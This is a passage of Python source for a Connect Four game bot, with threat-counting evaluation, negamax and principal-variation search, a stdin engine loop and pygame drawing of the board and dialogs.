if (self.board[0][3] == self.board[1][4] == self.board[2][5] == '2' and self.board[3][6] == '0'): num_threats_second += 1
if (self.board[0][3] == '0' and self.board[1][4] == self.board[2][5] == self.board[3][6] == '2'): num_threats_second += 1
if (self.board[0][3] == self.board[2][5] == self.board[3][6] == '2' and self.board[1][4] == '0'): num_threats_second += 1
if (self.board[0][3] == self.board[1][4] == self.board[3][6] == '2' and self.board[2][5] == '0'): num_threats_second += 1
for i in range(6):#check for horizontal threats
if (self.board[i][1] == self.board[i][2] == self.board[i][3] == '1'):
if (self.board[i][0] == '0'): num_threats_first += 1
if (self.board[i][4] == '0'): num_threats_first += 1
if (self.board[i][2] == self.board[i][3] == self.board[i][4] == '1'):
if (self.board[i][1] == '0'): num_threats_first += 1
if (self.board[i][5] == '0'): num_threats_first += 1
if (self.board[i][3] == self.board[i][4] == self.board[i][5] == '1'):
if (self.board[i][2] == '0'): num_threats_first += 1
if (self.board[i][6] == '0'): num_threats_first += 1
if (self.board[i][3] == '0'):
if (self.board[i][4] == self.board[i][5] == self.board[i][6] == '1'): num_threats_first += 1
if (self.board[i][0] == self.board[i][1] == self.board[i][2] == '1'): num_threats_first += 1
if (self.board[i][0] == self.board[i][2] == self.board[i][3] == '1' and self.board[i][1] == '0'): num_threats_first += 1#*_** pattern
if (self.board[i][1] == self.board[i][3] == self.board[i][4] == '1' and self.board[i][2] == '0'): num_threats_first += 1
if (self.board[i][2] == self.board[i][4] == self.board[i][5] == '1' and self.board[i][3] == '0'): num_threats_first += 1
if (self.board[i][3] == self.board[i][5] == self.board[i][6] == '1' and self.board[i][4] == '0'): num_threats_first += 1
if (self.board[i][0] == self.board[i][1] == self.board[i][3] == '1' and self.board[i][2] == '0'): num_threats_first += 1#**_* pattern
if (self.board[i][1] == self.board[i][2] == self.board[i][4] == '1' and self.board[i][3] == '0'): num_threats_first += 1
if (self.board[i][2] == self.board[i][3] == self.board[i][5] == '1' and self.board[i][4] == '0'): num_threats_first += 1
if (self.board[i][3] == self.board[i][4] == self.board[i][6] == '1' and self.board[i][5] == '0'): num_threats_first += 1
if (self.board[i][1] == self.board[i][2] == self.board[i][3] == '2'):
if (self.board[i][0] == '0'): num_threats_second += 1
if (self.board[i][4] == '0'): num_threats_second += 1
if (self.board[i][2] == self.board[i][3] == self.board[i][4] == '2'):
if (self.board[i][1] == '0'): num_threats_second += 1
if (self.board[i][5] == '0'): num_threats_second += 1
if (self.board[i][3] == self.board[i][4] == self.board[i][5] == '2'):
if (self.board[i][2] == '0'): num_threats_second += 1
if (self.board[i][6] == '0'): num_threats_second += 1
if (self.board[i][3] == '0'):
if (self.board[i][4] == self.board[i][5] == self.board[i][6] == '2'): num_threats_second += 1
if (self.board[i][0] == self.board[i][1] == self.board[i][2] == '2'): num_threats_second += 1
if (self.board[i][0] == self.board[i][2] == self.board[i][3] == '2' and self.board[i][1] == '0'): num_threats_second += 1 # *_** pattern
if (self.board[i][1] == self.board[i][3] == self.board[i][4] == '2' and self.board[i][2] == '0'): num_threats_second += 1
if (self.board[i][2] == self.board[i][4] == self.board[i][5] == '2' and self.board[i][3] == '0'): num_threats_second += 1
if (self.board[i][3] == self.board[i][5] == self.board[i][6] == '2' and self.board[i][4] == '0'): num_threats_second += 1
if (self.board[i][0] == self.board[i][1] == self.board[i][3] == '2' and self.board[i][2] == '0'): num_threats_second += 1 # **_* pattern
if (self.board[i][1] == self.board[i][2] == self.board[i][4] == '2' and self.board[i][3] == '0'): num_threats_second += 1
if (self.board[i][2] == self.board[i][3] == self.board[i][5] == '2' and self.board[i][4] == '0'): num_threats_second += 1
if (self.board[i][3] == self.board[i][4] == self.board[i][6] == '2' and self.board[i][5] == '0'): num_threats_second += 1
for i in range(7):#check for vertical threats
if (self.board[0][i] == self.board[1][i] == self.board[2][i] == '1' and self.board[3][i] == '0'): num_threats_first += 1
if (self.board[1][i] == self.board[2][i] == self.board[3][i]) == '1':
if (self.board[0][i] == '0'): num_threats_first += 1
if (self.board[4][i] == '0'): num_threats_first += 1
if (self.board[2][i] == self.board[3][i] == self.board[4][i]) == '1':
if (self.board[1][i] == '0'): num_threats_first += 1
if (self.board[5][i] == '0'): num_threats_first += 1
if (self.board[3][i] == self.board[4][i] == self.board[5][i] == '1' and self.board[2][i] == '0'): num_threats_first += 1
if (self.board[0][i] == self.board[2][i] == self.board[3][i] == '1' and self.board[1][i] == '0'): num_threats_first += 1
if (self.board[1][i] == self.board[3][i] == self.board[4][i] == '1' and self.board[2][i] == '0'): num_threats_first += 1
if (self.board[2][i] == self.board[4][i] == self.board[5][i] == '1' and self.board[3][i] == '0'): num_threats_first += 1
if (self.board[0][i] == self.board[1][i] == self.board[3][i] == '1' and self.board[2][i] == '0'): num_threats_first += 1
if (self.board[1][i] == self.board[2][i] == self.board[4][i] == '1' and self.board[3][i] == '0'): num_threats_first += 1
if (self.board[2][i] == self.board[3][i] == self.board[5][i] == '1' and self.board[4][i] == '0'): num_threats_first += 1
if (self.board[0][i] == self.board[1][i] == self.board[2][i] == '2' and self.board[3][i] == '0'): num_threats_second += 1
if (self.board[1][i] == self.board[2][i] == self.board[3][i]) == '2':
if (self.board[0][i] == '0'): num_threats_second += 1
if (self.board[4][i] == '0'): num_threats_second += 1
if (self.board[2][i] == self.board[3][i] == self.board[4][i]) == '2':
if (self.board[1][i] == '0'): num_threats_second += 1
if (self.board[5][i] == '0'): num_threats_second += 1
if (self.board[3][i] == self.board[4][i] == self.board[5][i] == '2' and self.board[2][i] == '0'): num_threats_second += 1
if (self.board[0][i] == self.board[2][i] == self.board[3][i] == '2' and self.board[1][i] == '0'): num_threats_second += 1
if (self.board[1][i] == self.board[3][i] == self.board[4][i] == '2' and self.board[2][i] == '0'): num_threats_second += 1
if (self.board[2][i] == self.board[4][i] == self.board[5][i] == '2' and self.board[3][i] == '0'): num_threats_second += 1
if (self.board[0][i] == self.board[1][i] == self.board[3][i] == '2' and self.board[2][i] == '0'): num_threats_second += 1
if (self.board[1][i] == self.board[2][i] == self.board[4][i] == '2' and self.board[3][i] == '0'): num_threats_second += 1
if (self.board[2][i] == self.board[3][i] == self.board[5][i] == '2' and self.board[4][i] == '0'): num_threats_second += 1
# print("returned score from valid moves: {}".format((my_count - opp_count)))
# print("threats_first = {}, threats_second = {}.".format(num_threats_first, num_threats_second))
return l_color * (num_threats_first - num_threats_second)
def is_terminal_node(self, l_color):
terminal_val = l_color * SMALL_INIFINITY
for i in range(6): # check for horizontal win/loss
for j in range(4):
if (self.board[i][j] == self.board[i][j + 1] == self.board[i][j + 2] == self.board[i][j + 3] == '1'): return terminal_val
if (self.board[i][j] == self.board[i][j + 1] == self.board[i][j + 2] == self.board[i][j + 3] == '2'): return -terminal_val
for j in range(7): # check for vertical win/loss
for i in range(3):
if (self.board[i][j] == self.board[i + 1][j] == self.board[i + 2][j] == self.board[i + 3][j] == '1'): return terminal_val
if (self.board[i][j] == self.board[i + 1][j] == self.board[i + 2][j] == self.board[i + 3][j] == '2'): return -terminal_val
# check for bottom_left -> top_right diagonal win/loss
if (self.board[3][0] == self.board[2][1] == self.board[1][2] == self.board[0][3] == '1'): return terminal_val
if (self.board[3][0] == self.board[2][1] == self.board[1][2] == self.board[0][3] == '2'): return -terminal_val
if (self.board[4][0] == self.board[3][1] == self.board[2][2] == self.board[1][3] == '1'): return terminal_val
if (self.board[4][0] == self.board[3][1] == self.board[2][2] == self.board[1][3] == '2'): return -terminal_val
if (self.board[3][1] == self.board[2][2] == self.board[1][3] == self.board[0][4] == '1'): return terminal_val
if (self.board[3][1] == self.board[2][2] == self.board[1][3] == self.board[0][4] == '2'): return -terminal_val
if (self.board[5][0] == self.board[4][1] == self.board[3][2] == self.board[2][3] == '1'): return terminal_val
if (self.board[5][0] == self.board[4][1] == self.board[3][2] == self.board[2][3] == '2'): return -terminal_val
if (self.board[4][1] == self.board[3][2] == self.board[2][3] == self.board[1][4] == '1'): return terminal_val
if (self.board[4][1] == self.board[3][2] == self.board[2][3] == self.board[1][4] == '2'): return -terminal_val
if (self.board[3][2] == self.board[2][3] == self.board[1][4] == self.board[0][5] == '1'): return terminal_val
if (self.board[3][2] == self.board[2][3] == self.board[1][4] == self.board[0][5] == '2'): return -terminal_val
if (self.board[5][1] == self.board[4][2] == self.board[3][3] == self.board[2][4] == '1'): return terminal_val
if (self.board[5][1] == self.board[4][2] == self.board[3][3] == self.board[2][4] == '2'): return -terminal_val
if (self.board[4][2] == self.board[3][3] == self.board[2][4] == self.board[1][5] == '1'): return terminal_val
if (self.board[4][2] == self.board[3][3] == self.board[2][4] == self.board[1][5] == '2'): return -terminal_val
if (self.board[3][3] == self.board[2][4] == self.board[1][5] == self.board[0][6] == '1'): return terminal_val
if (self.board[3][3] == self.board[2][4] == self.board[1][5] == self.board[0][6] == '2'): return -terminal_val
if (self.board[5][2] == self.board[4][3] == self.board[3][4] == self.board[2][5] == '1'): return terminal_val
if (self.board[5][2] == self.board[4][3] == self.board[3][4] == self.board[2][5] == '2'): return -terminal_val
if (self.board[4][3] == self.board[3][4] == self.board[2][5] == self.board[1][6] == '1'): return terminal_val
if (self.board[4][3] == self.board[3][4] == self.board[2][5] == self.board[1][6] == '2'): return -terminal_val
if (self.board[5][3] == self.board[4][4] == self.board[3][5] == self.board[2][6] == '1'): return terminal_val
if (self.board[5][3] == self.board[4][4] == self.board[3][5] == self.board[2][6] == '2'): return -terminal_val
# check for bottom_right -> top_left diagonal win/loss
if (self.board[2][0] == self.board[3][1] == self.board[4][2] == self.board[5][3] == '1'): return terminal_val
if (self.board[2][0] == self.board[3][1] == self.board[4][2] == self.board[5][3] == '2'): return -terminal_val
if (self.board[1][0] == self.board[2][1] == self.board[3][2] == self.board[4][3] == '1'): return terminal_val
if (self.board[1][0] == self.board[2][1] == self.board[3][2] == self.board[4][3] == '2'): return -terminal_val
if (self.board[2][1] == self.board[3][2] == self.board[4][3] == self.board[5][4] == '1'): return terminal_val
if (self.board[2][1] == self.board[3][2] == self.board[4][3] == self.board[5][4] == '2'): return -terminal_val
if (self.board[0][0] == self.board[1][1] == self.board[2][2] == self.board[3][3] == '1'): return terminal_val
if (self.board[0][0] == self.board[1][1] == self.board[2][2] == self.board[3][3] == '2'): return -terminal_val
if (self.board[1][1] == self.board[2][2] == self.board[3][3] == self.board[4][4] == '1'): return terminal_val
if (self.board[1][1] == self.board[2][2] == self.board[3][3] == self.board[4][4] == '2'): return -terminal_val
if (self.board[2][2] == self.board[3][3] == self.board[4][4] == self.board[5][5] == '1'): return terminal_val
if (self.board[2][2] == self.board[3][3] == self.board[4][4] == self.board[5][5] == '2'): return -terminal_val
if (self.board[0][1] == self.board[1][2] == self.board[2][3] == self.board[3][4] == '1'): return terminal_val
if (self.board[0][1] == self.board[1][2] == self.board[2][3] == self.board[3][4] == '2'): return -terminal_val
if (self.board[1][2] == self.board[2][3] == self.board[3][4] == self.board[4][5] == '1'): return terminal_val
if (self.board[1][2] == self.board[2][3] == self.board[3][4] == self.board[4][5] == '2'): return -terminal_val
if (self.board[2][3] == self.board[3][4] == self.board[4][5] == self.board[5][6] == '1'): return terminal_val
if (self.board[2][3] == self.board[3][4] == self.board[4][5] == self.board[5][6] == '2'): return -terminal_val
if (self.board[0][2] == self.board[1][3] == self.board[2][4] == self.board[3][5] == '1'): return terminal_val
if (self.board[0][2] == self.board[1][3] == self.board[2][4] == self.board[3][5] == '2'): return -terminal_val
if (self.board[1][3] == self.board[2][4] == self.board[3][5] == self.board[4][6] == '1'): return terminal_val
if (self.board[1][3] == self.board[2][4] == self.board[3][5] == self.board[4][6] == '2'): return -terminal_val
if (self.board[0][3] == self.board[1][4] == self.board[2][5] == self.board[3][6] == '1'): return terminal_val
if (self.board[0][3] == self.board[1][4] == self.board[2][5] == self.board[3][6] == '2'): return -terminal_val
return 0#returns 0 in case the node is not terminal
def make_move_on_board(self, move, l_color):
#makes move in the column with number equal to move, returns number of row the tile was placed
#print("entered make move with move = {}".format(move))
if (l_color == 1): tile = "1"
else: tile = "2"
column = int(move)
for i in range(6):
if (self.board[5 - i][column] == "0"):
self.board[5 - i][column] = tile
return 5 - i
def unmake_move(self, row, columm):
self.board[row][columm] = "0"
def get_valid_moves(self):
#returns [of column numbers for valid moves
#print("ENTERED GET_VALID_MOVES")
#print("board in valid moves: {}".format(self.board))
#print("type: {}".format(type(self.board[0][0])))
#print("type: {}".format(type(self.board[3][3])))
valid_moves = []
for j in range(7):
if (self.board[0][j] == '0'):
valid_moves.append(str(j))
#print("valid moves: {}".format(valid_moves))
return valid_moves
def negamax(self, l_color, depth, alpha, beta):
#print("entered negamax with color = {}, depth = {}, alpha = {}, beta = {}".format(color, depth, alpha, beta))
if (depth == 0): return self.eval_board(l_color)
is_terminal = self.is_terminal_node(l_color)
if (is_terminal != 0):
#print("IS TERMINAL!")
return is_terminal
possible_moves = self.get_valid_moves()
#print("possible moves: {}".format(possible_moves))
#random.shuffle(possible_moves)
#possible_moves = self.order_moves(possible_moves, l_color)
#print("possible moves: {}".format(possible_moves))
if (len(possible_moves) == 0):
#print("__________________________________EMPTY POSSIBLE MOVES________________________________________")
return self.eval_board(l_color)
for current_move in possible_moves:
row = self.make_move_on_board(current_move, l_color)
#print("made move {}".format(current_move))
#print("current board: {}".format(self.board))
new_score = -self.negamax(-l_color, depth - 1, -beta, -alpha)
#print("returned with value {}".format(new_score))
self.unmake_move(row, int(current_move))
if (new_score >= beta): return beta
if (new_score > alpha): alpha = new_score
return alpha
def root_search_negamax(self, l_color, depth, alpha, beta):
best_score = -INFINITY
best_move = ""
possible_moves = self.get_valid_moves()
if (len(possible_moves) == 0):
return self.eval_board(l_color)
#random.shuffle(possible_moves)
# possible_moves = self.order_moves(possible_moves, l_color)
#print("AT ROOT current board: {}".format(self.board))
for current_move in possible_moves:
# print("board before move: {}".format(self.board))
row = self.make_move_on_board(current_move, l_color)
# print("board after move: {}".format(self.board))
# print("entering negamax with color = {}, depth = {}, alpha = {}, beta = {}".format(-color, depth - 1, -beta, -alpha))
new_score = -self.negamax(-l_color, depth - 1, -beta, -alpha)
# print("board before unmake move: {}".format(self.board))
self.unmake_move(row, int(current_move))
# print("unmade move {} {}".format(row, int(current_move)))
# print("board after unmake move: {}".format(self.board))
if (new_score > alpha):
alpha = new_score
best_move = current_move
if (new_score >= beta):
break
return best_move
def pvs(self, l_color, depth, alpha, beta):
#print("entered pvs with color = {}, depth = {}, alpha = {}, beta = {}".format(l_color, depth, alpha, beta))
if (depth == 0): return self.eval_board(l_color)
is_terminal = self.is_terminal_node(l_color)
if (is_terminal != 0):
# print("IS TERMINAL!")
return is_terminal
possible_moves = self.get_valid_moves()
#print("possible moves: {}".format(possible_moves))
#random.shuffle(possible_moves)
#possible_moves = self.order_moves(possible_moves, l_color)
# print("possible moves: {}".format(possible_moves))
if (len(possible_moves) == 0):
#print("__________________________________EMPTY POSSIBLE MOVES________________________________________")
return self.eval_board(l_color)
found_pv = False
for current_move in possible_moves:
row = self.make_move_on_board(current_move, l_color)
#print("made move {}".format(current_move))
# print("current board: {}".format(self.board))
if (found_pv):
new_score = -self.pvs(-l_color, depth - 1, -alpha - 1, -alpha)
if (new_score > alpha and new_score < beta):
new_score = -self.pvs(-l_color, depth - 1, -beta, -alpha)
else: new_score = -self.pvs(-l_color, depth - 1, -beta, -alpha)
#print("returned with value {}".format(new_score))
self.unmake_move(row, int(current_move))
if (new_score >= beta): return beta
if (new_score > alpha):
alpha = new_score
found_pv = True
return alpha
def root_search_pvs(self, l_color, depth, alpha, beta):
#print("AT ROOT entered pvs with color = {}, depth = {}, alpha = {}, beta = {}".format(l_color, depth, alpha, beta))
best_score = -INFINITY
best_move = ""
possible_moves = self.get_valid_moves()
if (len(possible_moves) == 0):
return self.eval_board(l_color)
#random.shuffle(possible_moves)
possible_moves = self.order_moves(possible_moves, l_color)
#print("AT ROOT current board: {}".format(self.board))
#print("AT ROOT possible moves: {}".format(possible_moves))
found_pv = False
for current_move in possible_moves:
#print("AT ROOT current best move: {}".format(best_move))
#print("board before move: {}".format(self.board))
row = self.make_move_on_board(current_move, l_color)
#print("AT ROOT made move {}".format(current_move))
if (found_pv):
new_score = -self.pvs(-l_color, depth - 1, -alpha - 1, -alpha)
if (new_score > alpha and new_score < beta):
new_score = -self.pvs(-l_color, depth - 1, -beta, -alpha)
else:
new_score = -self.pvs(-l_color, depth - 1, -beta, -alpha)
#print("board after move: {}".format(self.board))
#print("entering negamax with color = {}, depth = {}, alpha = {}, beta = {}".format(-color, depth - 1, -beta, -alpha))
#print("AT ROOT returned with value {} for move {}".format(new_score, current_move))
#print("board before unmake move: {}".format(self.board))
self.unmake_move(row, int(current_move))
#print("unmade move {} {}".format(row, int(current_move)))
#print("board after unmake move: {}".format(self.board))
if (new_score > alpha):
alpha = new_score
best_move = current_move
found_pv = True
if (new_score >= beta):
#print("TRIGGERED BETA")
break
#print("AT ROOT FINALLY possible moves: {}".format(possible_moves))
#print("AT ROOT FINALLY best move: {}".format(best_move))
#print("AT ROOT FINALLY best move: {}".format(best_move))
return best_move
def order_moves(self, valid_moves, l_color):
possible_move_score_pairs = []
valid_moves_ordered = []
for curr_move in valid_moves:
row = self.make_move_on_board(curr_move, l_color)
curr_eval = self.eval_board(l_color)
self.unmake_move(row, int(curr_move))
possible_move_score_pairs.append((curr_eval, curr_move))
possible_move_score_pairs_ordered = sorted(possible_move_score_pairs, key=lambda x: x[0], reverse=True)
#for pair in possible_move_score_pairs_ordered:
#valid_moves_ordered.append(pair[1])
#return valid_moves_ordered
return [pair[1] for pair in possible_move_score_pairs_ordered]
def send_move(self, move):
sys.stdout.write("place_disc {}".format(move) + "\n")
sys.stdout.flush()
def get_random_move(self): return random.randint(0, 6)
def run(self):
print("hi")
while not sys.stdin.closed:
# print("CURRENT BOARD: {}".format(my_bot.board))
m_input = sys.stdin.readline().strip()
if (m_input):
msg = m_input.split(" ")
if (msg[0] == "settings"):
my_bot.store_settings(msg)
elif (msg[0] == "update"):
my_bot.update(msg)
elif (msg[0] == "action"):
# my_bot.make_move(self.get_random_move())
computer_move = my_bot.root_search_negamax(my_bot.color, MINIMAX_DEPTH, ALPHA_0, BETA_0)
my_bot.make_move(computer_move, my_bot.color)
my_bot.send_move(computer_move)
def draw_board(self):
pygame.init()
pygame.display.init()
FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE)
self.window.window.fill(BACKGROUND_COLOR)
pygame.draw.polygon(self.window.window, BOARD_COLOR, (((WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2), (BOARDWIDTH + (WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2), (BOARDWIDTH + (WINDOWWIDTH - BOARDWIDTH) / 2, BOARDHEIGHT + (WINDOWHEIGHT - BOARDHEIGHT) / 2), ((WINDOWWIDTH - BOARDWIDTH) / 2, BOARDHEIGHT + (WINDOWHEIGHT - BOARDHEIGHT) / 2)))
pygame.draw.polygon(self.window.window, WHITE, (((WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2), (BOARDWIDTH + (WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2), (BOARDWIDTH + (WINDOWWIDTH - BOARDWIDTH) / 2, BOARDHEIGHT / 7 + (WINDOWHEIGHT - BOARDHEIGHT) / 2), ((WINDOWWIDTH - BOARDWIDTH) / 2, BOARDHEIGHT / 7 + (WINDOWHEIGHT - BOARDHEIGHT) / 2)))
for i in range(8):
pygame.draw.line(self.window.window, BLACK, ((WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2 + i * BOARDHEIGHT / 7), ((WINDOWWIDTH - BOARDWIDTH) / 2 + BOARDWIDTH, (WINDOWHEIGHT - BOARDHEIGHT) / 2 + i * BOARDHEIGHT / 7), 2)
pygame.draw.line(self.window.window, BLACK, ((WINDOWWIDTH - BOARDWIDTH) / 2 + i * BOARDWIDTH / 7, (WINDOWHEIGHT - BOARDHEIGHT) / 2 ), ((WINDOWWIDTH - BOARDWIDTH) / 2 + i * BOARDWIDTH / 7, (WINDOWHEIGHT - BOARDHEIGHT) / 2 + BOARDHEIGHT), 2)
for i in range(7):
text = FONT.render(str(i), True, BLACK, WHITE)
textRect = text.get_rect()
textRect.centerx = self.window.window.get_rect().centerx
textRect.centery = self.window.window.get_rect().centery
self.window.window.blit(text, ((WINDOWWIDTH - BOARDWIDTH) / 2 + i * BOARDWIDTH / 7 + (BOARDWIDTH / 7 - TEXT_SIZE / 2) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2 + (BOARDHEIGHT / 7 - TEXT_SIZE) / 2))
for i in range(6):
for j in range(7):
if (self.board[i][j] == '1'):
pygame.draw.circle(self.window.window, RED, (int(X_MARGIN + j * BOARDWIDTH / 7 + BOARDWIDTH / (7 * 2)), int(Y_MARGIN + (i + 1) * BOARDHEIGHT / 7 + BOARDHEIGHT / (7 * 2))), DISC_RADIUS, 0)
elif (self.board[i][j] == '2'):
pygame.draw.circle(self.window.window, YELLOW, (int(X_MARGIN + j * BOARDWIDTH / 7 + BOARDWIDTH / (7 * 2)), int(Y_MARGIN + (i + 1) * BOARDHEIGHT / 7 + BOARDHEIGHT / (7 * 2))), DISC_RADIUS, 0)
elif (self.board[i][j] == '0'):
pygame.draw.circle(self.window.window, WHITE, (
int(X_MARGIN + j * BOARDWIDTH / 7 + BOARDWIDTH / (7 * 2)), int(Y_MARGIN + (i + 1) * BOARDHEIGHT / 7 + BOARDHEIGHT / (7 * 2))), DISC_RADIUS, 0)
pygame.display.update()
def draw_choose_first_move2(self):
WINDOWHEIGHT_FIRST_MOVE = WINDOWHEIGHT // 2
WINDOWWIDTH_FIRST_MOVE = WINDOWWIDTH // 2
TEXT_SIZE_FIRST_MOVE = 16
first_move_window = pygame.display.set_mode((WINDOWWIDTH_FIRST_MOVE, WINDOWHEIGHT_FIRST_MOVE))
pygame.display.set_caption("Four in a row")
FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE_FIRST_MOVE)
first_move_window.fill(BACKGROUND_COLOR)
text_choose = FONT.render("Choose who moves first: ", True, BLACK, WHITE)
textRect_choose = text_choose.get_rect()
textRect_choose.centerx = first_move_window.get_rect().centerx
textRect_choose.centery = first_move_window.get_rect().centery
first_move_window.blit(text_choose, (WINDOWWIDTH_FIRST_MOVE // 4, WINDOWHEIGHT_FIRST_MOVE // 4))
text_player = FONT.render("Player ", True, BLACK, WHITE)
text_player_rect = text_player.get_rect()
#text_player_rect.centerx = first_move_window.get_rect().centerx
#text_player_rect.centery = first_move_window.get_rect().centery
text_player_rect.centerx = WINDOWWIDTH_FIRST_MOVE // 4 + text_player_rect.w / 2
text_player_rect.centery = WINDOWHEIGHT_FIRST_MOVE // 2 + text_player_rect.h / 2
first_move_window.blit(text_player, (WINDOWWIDTH_FIRST_MOVE // 4, WINDOWHEIGHT_FIRST_MOVE // 2))
text_computer = FONT.render("Computer", True, BLACK, WHITE)
text_computer_rect = text_computer.get_rect()
text_computer_rect.centerx = WINDOWWIDTH_FIRST_MOVE // 2 + text_computer_rect.w / 2
text_computer_rect.centery = WINDOWHEIGHT_FIRST_MOVE // 2 + text_computer_rect.h / 2
first_move_window.blit(text_computer, (WINDOWWIDTH_FIRST_MOVE // 2, WINDOWHEIGHT_FIRST_MOVE // 2))
no_input = True
#print(text_player_rect.top, text_player_rect.bottom, text_player_rect.left, text_player_rect.right, text_player_rect.topleft)
print(text_player_rect.topleft, text_player_rect.bottomright)
while (no_input):
for event in pygame.event.get():
if event.type == pygame.locals.QUIT:
pygame.quit()
sys.exit()
elif (event.type == pygame.locals.MOUSEBUTTONUP and event.button == 1):
cursor_x = pygame.mouse.get_pos()[0]
cursor_y = pygame.mouse.get_pos()[1]
if (text_player_rect.collidepoint(cursor_x, cursor_y)):
self.color = -1
self.side_to_move = 42
no_input = False
if (text_computer_rect.collidepoint(cursor_x, cursor_y)):
self.color = 1
self.side_to_move = -42
no_input = False
pygame.display.update()
time.sleep(0.1)
pygame.display.quit()
#pygame.quit()
def draw_choose_first_move(self):
pygame.display.set_caption("Four in a row")
FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE_FIRST_MOVE)
self.window.window.fill(BACKGROUND_COLOR)
text_choose = FONT.render("Choose who moves first: ", True, BLACK, WHITE)
textRect_choose = text_choose.get_rect()
textRect_choose.centerx = self.window.window.get_rect().centerx
textRect_choose.centery = self.window.window.get_rect().centery
self.window.window.blit(text_choose, (WINDOWWIDTH // 4, WINDOWHEIGHT // 3))
text_player = FONT.render("Player ", True, BLACK, WHITE)
text_player_rect = text_player.get_rect()
# text_player_rect.centerx = first_move_window.get_rect().centerx
# text_player_rect.centery = first_move_window.get_rect().centery
text_player_rect.centerx = WINDOWWIDTH // 4 + text_player_rect.w / 2
text_player_rect.centery = WINDOWHEIGHT // 2 + text_player_rect.h / 2
self.window.window.blit(text_player, (WINDOWWIDTH // 4, WINDOWHEIGHT // 2))
text_computer = FONT.render("Computer", True, BLACK, WHITE)
text_computer_rect = text_computer.get_rect()
text_computer_rect.centerx = WINDOWWIDTH // 2 + text_computer_rect.w / 2
text_computer_rect.centery = WINDOWHEIGHT // 2 + text_computer_rect.h / 2
self.window.window.blit(text_computer, (WINDOWWIDTH // 2, WINDOWHEIGHT // 2))
no_input = True
# print(text_player_rect.top, text_player_rect.bottom, text_player_rect.left, text_player_rect.right, text_player_rect.topleft)
#print(text_player_rect.topleft, text_player_rect.bottomright)
while (no_input):
for event in pygame.event.get():
if event.type == pygame.locals.QUIT:
pygame.quit()
sys.exit()
elif (event.type == pygame.locals.MOUSEBUTTONUP and event.button == 1):
cursor_x = pygame.mouse.get_pos()[0]
cursor_y = pygame.mouse.get_pos()[1]
#print("clicked at ({}, {})".format(cursor_x, cursor_y))
if (text_player_rect.collidepoint(cursor_x, cursor_y)):
# print("player!!!")
self.color = -1
self.side_to_move = 42
no_input = False
if (text_computer_rect.collidepoint(cursor_x, cursor_y)):
# print("computer!!!")
self.color = 1
self.side_to_move = -42
no_input = False
pygame.display.update()
time.sleep(0.1)
#pygame.display.quit()
# pygame.quit()
def show_game_result(self):
game_result_caption = ""
print("Game is finished!")
if (self.check_is_finished() == 1):
if (self.color == 1):
game_result_caption = "Computer won!"
else:
game_result_caption = "Player won!"
elif (self.check_is_finished() == 2):
if (self.color == -1):
game_result_caption = "Computer won!"
else:
game_result_caption = "Player won!"
else:
game_result_caption = "Computer won!"
pygame.display.set_caption(game_result_caption)
FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE_GAME_RESULT)
#self.window.window.fill(BACKGROUND_COLOR)
text_game_result = FONT.render(game_result_caption, True, BLACK, WHITE)
text_game_result_rect = pygame.Rect(X_MARGIN, (Y_MARGIN - SQUARE_SIZE) // 2, BOARDWIDTH, BOARDHEIGHT // 7)
text_game_result_rect = text_game_result.get_rect()
text_game_result_rect.centerx = X_MARGIN // 2 #+ BOARDWIDTH // 2
text_game_result_rect.centery = Y_MARGIN // 2 #+ BOARDHEIGHT // 2
self.window.window.blit(text_game_result, (X_MARGIN, (Y_MARGIN - SQUARE_SIZE) // 2))
pygame.display.update()
def show_play_again_dialog(self):
FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE_PLAY_AGAIN)
text_play_again = FONT.render("Play again?", True, BLACK, WHITE)
text_play_again_rect = pygame.Rect(int(X_MARGIN * 1.1) + BOARDWIDTH, Y_MARGIN, X_MARGIN, BOARDHEIGHT // 7)
text_play_again_rect = text_play_again.get_rect()
text_play_again_rect.centerx = X_MARGIN + BOARDWIDTH + X_MARGIN // 2
text_play_again_rect.centery = Y_MARGIN + BOARDHEIGHT // (2 * 7)
self.window.window.blit(text_play_again, (int(X_MARGIN * 1.1) + BOARDWIDTH, Y_MARGIN))
text_yes = FONT.render("Yes", True, BLACK, WHITE)
yes_rect = text_yes.get_rect()
text_yes_rect = pygame.Rect(X_MARGIN + BOARDWIDTH + BOARDWIDTH // (4 * 7), Y_MARGIN + BOARDHEIGHT // (7), yes_rect.w, yes_rect.h)
text_yes_rect = text_yes.get_rect()
text_yes_rect.centerx = X_MARGIN + BOARDWIDTH + BOARDWIDTH // (4 * 7) + yes_rect.w // 2
text_yes_rect.centery = Y_MARGIN + BOARDHEIGHT // (7) + yes_rect.h // 2
self.window.window.blit(text_yes, (X_MARGIN + BOARDWIDTH + BOARDWIDTH // (4 * 7), Y_MARGIN + BOARDHEIGHT // (7)))
text_no = FONT.render("No", True, BLACK, WHITE)
no_rect = text_no.get_rect()
text_no_rect = pygame.Rect(X_MARGIN + BOARDWIDTH + BOARDWIDTH * 0.2, Y_MARGIN + BOARDHEIGHT // (7), no_rect.w, no_rect.h)
text_no_rect = text_no.get_rect()
text_no_rect.centerx = X_MARGIN + BOARDWIDTH + BOARDWIDTH * 0.2 + no_rect.w // 2
text_no_rect.centery = Y_MARGIN + BOARDHEIGHT // (7) + no_rect.h // 2
self.window.window.blit(text_no, (X_MARGIN + BOARDWIDTH + BOARDWIDTH * 0.2, Y_MARGIN + BOARDHEIGHT // (7)))
pygame.display.update()
no_input = True
while (no_input):
for event in pygame.event.get():
if event.type == pygame.locals.QUIT:
pygame.quit()
sys.exit()
elif (event.type == pygame.locals.MOUSEBUTTONUP and event.button == 1):
cursor_x = pygame.mouse.get_pos()[0]
cursor_y = pygame.mouse.get_pos()[1]
#print("clicked at ({}, {})".format(cursor_x, cursor_y))
if (text_yes_rect.collidepoint(cursor_x, cursor_y)):
no_input = False
elif (text_no_rect.collidepoint(cursor_x, cursor_y)):
self.play_again = False
no_input = False
